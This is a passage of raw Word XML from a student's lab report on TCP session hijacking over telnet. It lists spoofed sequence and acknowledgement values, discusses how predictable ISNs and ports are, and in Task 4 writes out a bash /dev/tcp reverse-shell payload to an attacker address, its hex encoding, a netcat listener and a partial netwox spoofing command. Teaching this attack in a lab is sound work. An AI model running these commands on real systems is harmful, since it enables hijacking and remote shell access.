        <w:t xml:space="preserve"> – Obtained from the TCP Retransmission packet data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D023DB" w14:textId="77777777" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="007A14D4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: 10.0.2.6,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FC76A0" w14:textId="77777777" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="007A14D4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: 10.0.2.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205FD1D0" w14:textId="77777777" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="007A14D4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Port: 23, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1700CB71" w14:textId="77777777" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="007A14D4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Port: 40308, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14896E58" w14:textId="77777777" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="007A14D4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Seq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>4269703895</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775AD399" w14:textId="77777777" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="007A14D4">
      <w:r>
        <w:t xml:space="preserve">Ack: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E75736">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2125997839</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7274862C" w14:textId="0C7EE752" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="007A14D4"/>
    <w:p w14:paraId="7B7CFF57" w14:textId="7A8C3918" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="007A14D4">
      <w:r>
        <w:t xml:space="preserve">To get rid of the TCP Retransmission the attacker need to send a packet with the following information: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4C2DE8" w14:textId="77777777" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="007A14D4">
      <w:r>
        <w:t>ACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348A1B16" w14:textId="77777777" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="007A14D4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: 10.0.2.5, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313DF3EF" w14:textId="77777777" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="007A14D4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: 10.0.2.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C3E29B" w14:textId="77777777" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="007A14D4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Port: 40308, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D9126C" w14:textId="77777777" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="007A14D4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Port: 23, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A4A954" w14:textId="77777777" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="007A14D4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Seq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E75736">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2125997839</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5060B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F00CB29" w14:textId="77777777" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="007A14D4">
      <w:r>
        <w:t xml:space="preserve">Ack: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E75736">
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t>4269703</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00E75736">
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t>95</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE2CD19" w14:textId="77777777" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="00C550FB"/>
    <w:p w14:paraId="4F1C5907" w14:textId="1701860A" w:rsidR="00757FAD" w:rsidRDefault="00757FAD" w:rsidP="00C550FB"/>
    <w:p w14:paraId="307FF26B" w14:textId="77777777" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="00C550FB"/>
    <w:p w14:paraId="0FF4D55F" w14:textId="6E5D330A" w:rsidR="00757FAD" w:rsidRDefault="00757FAD" w:rsidP="00C550FB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SENDING THE ACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F708A43" w14:textId="3FCE7A42" w:rsidR="00757FAD" w:rsidRDefault="00757FAD" w:rsidP="00C550FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F351894" wp14:editId="346C2764">
            <wp:extent cx="6645910" cy="4629150"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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645910" cy="4629150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E876A92" w14:textId="77777777" w:rsidR="00683F7F" w:rsidRDefault="00683F7F" w:rsidP="00C550FB"/>
    <w:p w14:paraId="5D326D34" w14:textId="26EF67B0" w:rsidR="00C550FB" w:rsidRDefault="00757FAD" w:rsidP="00C550FB">
      <w:r>
        <w:t>Result: There are no more TCP retransmission abnormalities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193CD10B" w14:textId="4FBA8BCD" w:rsidR="00757FAD" w:rsidRDefault="00757FAD" w:rsidP="00C550FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6916B0B9" wp14:editId="2AE68775">
            <wp:extent cx="6645910" cy="4318635"/>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4318635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3786F6E5" w14:textId="77777777" w:rsidR="00757FAD" w:rsidRDefault="00757FAD" w:rsidP="00C550FB"/>
    <w:p w14:paraId="72944B10" w14:textId="77777777" w:rsidR="00C550FB" w:rsidRPr="00586072" w:rsidRDefault="00C550FB" w:rsidP="00C550FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="007006A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>Summarize the patterns you observed. (10 marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DB4276" w14:textId="6599AF25" w:rsidR="00B64665" w:rsidRDefault="00B64665" w:rsidP="00B64665">
      <w:r>
        <w:t>Study the pattern of the TCP Initial Sequence Numbers (ISN), and answer whether the patterns are predictable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC62752" w14:textId="6DB252F4" w:rsidR="00757FAD" w:rsidRDefault="007A78EE" w:rsidP="007006A9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Yes, the TCP ISN is predictable. </w:t>
      </w:r>
      <w:r w:rsidR="007006A9">
        <w:t>The ISN is a unique 32-bit sequence number assigned to a new connection of TCP based data communication. This means that although it is very large, it is also finite, ranging from 0 to 2</w:t>
      </w:r>
      <w:r w:rsidR="007006A9">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidR="007006A9">
        <w:t xml:space="preserve"> -1 sequence numbers. This means that we will only be able to send 4GB of unique ISN numbers before the sequence numbers are completely used up and we will start reusing the sequence numbers. As per RFC793, this means that the ISN cycle approximately every 4.55 hours. Additionally, the RFC793 specifies “that the 32 bit counter is to be incremented by 1 in the low-order position about every 4 microsecond.” </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006A3387" w14:textId="77777777" w:rsidR="00757FAD" w:rsidRDefault="00757FAD" w:rsidP="00757FAD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64918E18" w14:textId="429224CB" w:rsidR="00B64665" w:rsidRDefault="00B64665" w:rsidP="00B64665">
      <w:r>
        <w:t>Study the pattern of TCP window size, and describe your observations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5E9040" w14:textId="1D8B6EC6" w:rsidR="007A78EE" w:rsidRPr="006360CA" w:rsidRDefault="001144BB" w:rsidP="00B64665">
      <w:r>
        <w:t xml:space="preserve">The TCP window size that is </w:t>
      </w:r>
      <w:r w:rsidR="00132BD0">
        <w:t xml:space="preserve">used for </w:t>
      </w:r>
      <w:r w:rsidR="00757FAD">
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="006360CA">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00132BD0">
        <w:t xml:space="preserve">operation is 509. </w:t>
      </w:r>
      <w:r w:rsidR="006360CA">
        <w:t xml:space="preserve">TCP window size </w:t>
      </w:r>
      <w:r w:rsidR="00132BD0">
        <w:t>is operating system specific</w:t>
      </w:r>
      <w:r w:rsidR="000E2258">
        <w:t xml:space="preserve"> and is predictable.</w:t>
      </w:r>
      <w:r w:rsidR="007A78EE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006360CA">
        <w:t>Additionally, t</w:t>
      </w:r>
      <w:r w:rsidR="007006A9">
        <w:t>he TCP header is 16 bits field. This means that the largest window size that can be used is 2</w:t>
      </w:r>
      <w:r w:rsidR="006360CA">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidR="006360CA">
        <w:t xml:space="preserve"> = 65K bytes. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C35598" w14:textId="77777777" w:rsidR="007A78EE" w:rsidRDefault="007A78EE" w:rsidP="00B64665"/>
    <w:p w14:paraId="3E10A996" w14:textId="3F0517C5" w:rsidR="00C550FB" w:rsidRDefault="00B64665" w:rsidP="00B64665">
      <w:r>
        <w:t>Study the pattern of the source port numbers, and answer whether the patterns are predictable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2046B43D" w14:textId="1389E288" w:rsidR="00C550FB" w:rsidRDefault="001144BB" w:rsidP="00C550FB">
      <w:r>
        <w:t xml:space="preserve">Yes, the source port number is predictable. </w:t>
      </w:r>
      <w:r w:rsidR="007A78EE">
        <w:t>The well-known ports are 0-1023 and the registered port numbers are 1024 – 49151. Usually when clients set up a connection with a server, they do not specify the port numbers. Thus, are automatically chosen by the networking stack, these are called the ephemeral ports. The ephemeral port selection is done through this algorithm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496F9C74" w14:textId="1892C089" w:rsidR="007A78EE" w:rsidRDefault="007A78EE" w:rsidP="00C550FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77CE89B6" wp14:editId="362DDD62">
            <wp:extent cx="6172200" cy="46101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72200" cy="4610100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F109A1" w14:textId="6668541C" w:rsidR="007A78EE" w:rsidRDefault="007A78EE" w:rsidP="00C550FB">
      <w:r>
        <w:t xml:space="preserve">As written in the RFC 6056. </w:t>
      </w:r>
      <w:r w:rsidRPr="007A78EE">
        <w:t>https://datatracker.ietf.org/doc/html/rfc6056</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1983AF75" w14:textId="77777777" w:rsidR="00586072" w:rsidRDefault="00586072">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="537D4C58" w14:textId="3B71D84C" w:rsidR="00C550FB" w:rsidRDefault="00C550FB" w:rsidP="00C550FB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 4 (30 marks):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E6B10D" w14:textId="77777777" w:rsidR="00C550FB" w:rsidRDefault="00C550FB" w:rsidP="00C550FB"/>
    <w:p w14:paraId="1522F47A" w14:textId="4D048866" w:rsidR="00C550FB" w:rsidRPr="006B1D6F" w:rsidRDefault="00C550FB" w:rsidP="0015263C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B1D6F">
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>Describe how you create a reverse shell. (15 marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3545ACD7" w14:textId="38B9E521" w:rsidR="0015263C" w:rsidRDefault="0015263C" w:rsidP="0015263C"/>
    <w:p w14:paraId="2C3017DF" w14:textId="570886F5" w:rsidR="0015263C" w:rsidRDefault="0015263C" w:rsidP="0015263C">
      <w:r>
        <w:t xml:space="preserve">Here are the network configuration of the client, server, and attacker. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C10919D" w14:textId="77777777" w:rsidR="0015263C" w:rsidRDefault="0015263C" w:rsidP="0015263C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="426A789B" wp14:editId="4EB69980">
            <wp:extent cx="6602988" cy="1636224"/>
            <wp:effectExtent l="0" t="0" r="127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23191" cy="1641230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AF1871" w14:textId="77777777" w:rsidR="0015263C" w:rsidRDefault="0015263C" w:rsidP="0015263C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18703556" wp14:editId="5990202E">
            <wp:extent cx="6578600" cy="1676325"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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69602" cy="1699514"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="024969D1" w14:textId="77777777" w:rsidR="0015263C" w:rsidRDefault="0015263C" w:rsidP="0015263C">
      <w:r>
        <w:t>This is the attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556D2455" w14:textId="77777777" w:rsidR="0015263C" w:rsidRDefault="0015263C" w:rsidP="0015263C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52C45613" wp14:editId="17890360">
            <wp:extent cx="6464300" cy="150605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500009" cy="1514375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="500A0A0B" w14:textId="77777777" w:rsidR="0015263C" w:rsidRDefault="0015263C" w:rsidP="0015263C"/>
    <w:p w14:paraId="7C7E9530" w14:textId="3732D29D" w:rsidR="005A56B2" w:rsidRDefault="005A56B2" w:rsidP="00C550FB">
      <w:r>
        <w:t xml:space="preserve">Step 1: find the hexadecimal conversion of the command we want to inject. We want to inject this code into the server: </w:t>
      </w:r>
      <w:r w:rsidRPr="005A56B2">
        <w:t>bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A56B2">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A56B2">
        <w:t xml:space="preserve"> &gt; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A56B2">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A56B2">
        <w:t>/10.10.10.2/9090 0&lt;&amp;1 2&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, to open a shell on the attacker’s machine. We should add a </w:t>
      </w:r>
      <w:r w:rsidR="0015263C">
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:t>r in front of the command such that it will run it without concatenating with previous commands. Thus the string we want to inject is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70471D82" w14:textId="77777777" w:rsidR="0015263C" w:rsidRDefault="0015263C" w:rsidP="00C550FB">
      <w:r w:rsidRPr="0015263C">
        <w:t>﻿S = "\r /bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015263C">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0015263C">
        <w:t xml:space="preserve"> &gt; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015263C">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0015263C">
        <w:t>/10.0.2.4/9090 0&lt;&amp;1 2&gt;&amp;1 \r"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AD619B" w14:textId="798B4E48" w:rsidR="005A56B2" w:rsidRDefault="005A56B2" w:rsidP="00C550FB">
      <w:r>
        <w:t xml:space="preserve">Using python: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093D0B50" w14:textId="128A684F" w:rsidR="005A56B2" w:rsidRDefault="0015263C" w:rsidP="00C550FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62D051F3" wp14:editId="3CDDFCC6">
            <wp:extent cx="6858000" cy="74363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tretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6866863" cy="744600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1124B1A4" w14:textId="0D415275" w:rsidR="005A56B2" w:rsidRDefault="005A56B2" w:rsidP="00C550FB">
      <w:r>
        <w:t>Thus this is the string we want to inject:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E051A5D" w14:textId="37A05FC0" w:rsidR="005A56B2" w:rsidRDefault="005A56B2" w:rsidP="00C550FB">
      <w:r w:rsidRPr="005A56B2">
        <w:t>﻿</w:t>
      </w:r>
      <w:r w:rsidR="0015263C" w:rsidRPr="0015263C">
        <w:t xml:space="preserve"> ﻿'0d202f62696e2f62617368202d69203e202f6465762f7463702f31302e302e322e342f3930393020303c263120323e2631200d'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D859228" w14:textId="092F587C" w:rsidR="0015263C" w:rsidRDefault="0015263C" w:rsidP="00322C66"/>
    <w:p w14:paraId="7862435E" w14:textId="7ADBDE9E" w:rsidR="003103A8" w:rsidRDefault="003103A8" w:rsidP="00322C66"/>
    <w:p w14:paraId="5FF83D92" w14:textId="515EF2B7" w:rsidR="00290AB9" w:rsidRDefault="00290AB9" w:rsidP="00322C66"/>
    <w:p w14:paraId="429226CE" w14:textId="77777777" w:rsidR="00290AB9" w:rsidRDefault="00290AB9" w:rsidP="00322C66"/>
    <w:p w14:paraId="0509DBEF" w14:textId="664715FF" w:rsidR="003103A8" w:rsidRDefault="003103A8" w:rsidP="00322C66"/>
    <w:p w14:paraId="5023BDFD" w14:textId="77777777" w:rsidR="003103A8" w:rsidRDefault="003103A8" w:rsidP="00322C66"/>
    <w:p w14:paraId="11D3C3C9" w14:textId="7AA315BB" w:rsidR="00322C66" w:rsidRDefault="00322C66" w:rsidP="00322C66">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The client telnets into server as usual. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BCC3DD" w14:textId="671A8A9B" w:rsidR="00322C66" w:rsidRDefault="0015263C" w:rsidP="00C550FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00444D74" wp14:editId="50A02C8A">
            <wp:extent cx="5684480" cy="3390900"/>
            <wp:effectExtent l="0" t="0" r="571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87245" cy="3392550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E117EED" w14:textId="678641DE" w:rsidR="00322C66" w:rsidRDefault="00322C66" w:rsidP="00C550FB"/>
    <w:p w14:paraId="2499C2FB" w14:textId="458E34C3" w:rsidR="00322C66" w:rsidRDefault="00873DA1" w:rsidP="00C550FB">
      <w:r>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r w:rsidR="00322C66">
        <w:t xml:space="preserve">Attacker would sniff the packet using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00322C66">
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0368AACE" w14:textId="411B58A7" w:rsidR="00322C66" w:rsidRDefault="0015263C" w:rsidP="00C550FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5124C816" wp14:editId="46DF68CA">
            <wp:extent cx="6606862" cy="457200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4830" cy="4598274"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EFF1BC" w14:textId="44AB4793" w:rsidR="00322C66" w:rsidRDefault="00322C66" w:rsidP="00C550FB"/>
    <w:p w14:paraId="79E5B29B" w14:textId="2ACC4BBA" w:rsidR="001C388A" w:rsidRDefault="00873DA1" w:rsidP="00C550FB">
      <w:r>
        <w:t xml:space="preserve">Step 3: </w:t>
      </w:r>
      <w:r w:rsidR="001C388A">
        <w:t xml:space="preserve">Attacker opens a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001C388A">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001C388A">
        <w:t xml:space="preserve"> session at port 9090.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA8314C" w14:textId="7AB1843C" w:rsidR="001C388A" w:rsidRDefault="0015263C" w:rsidP="00C550FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="072AF18E" wp14:editId="08A72EB8">
            <wp:extent cx="3230088" cy="873251"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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41932" cy="876453"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F5B855" w14:textId="77777777" w:rsidR="001C388A" w:rsidRDefault="001C388A" w:rsidP="00C550FB"/>
    <w:p w14:paraId="501DE173" w14:textId="30CF87FA" w:rsidR="001C388A" w:rsidRDefault="00873DA1" w:rsidP="00C550FB">
      <w:r>
        <w:t xml:space="preserve">Step 4: </w:t>
      </w:r>
      <w:r w:rsidR="00322C66">
        <w:t>Attacker send spoofing packet from TCP Hijacking Session, with the payload data of the hexadecimal obtained in step 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071F4090" w14:textId="3324B7DC" w:rsidR="0015263C" w:rsidRDefault="00873DA1" w:rsidP="00C550FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="138246CC" wp14:editId="78D248DE">
            <wp:extent cx="5440749" cy="3792221"/>
            <wp:effectExtent l="0" t="0" r="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8572" cy="3811614"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E35AC7E" w14:textId="257F20DA" w:rsidR="00322C66" w:rsidRDefault="00873DA1" w:rsidP="00C550FB">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00873DA1">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00873DA1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00873DA1">
        <w:t>netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00873DA1">
        <w:t xml:space="preserve"> 40 --ip4-dontfrag --ip4-offsetfrag 0 --ip4-ttl 64 --ip4-protocol 6 --ip4-src 10.0.2.5 --ip4-dst 10.0.2.6 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00873DA1">
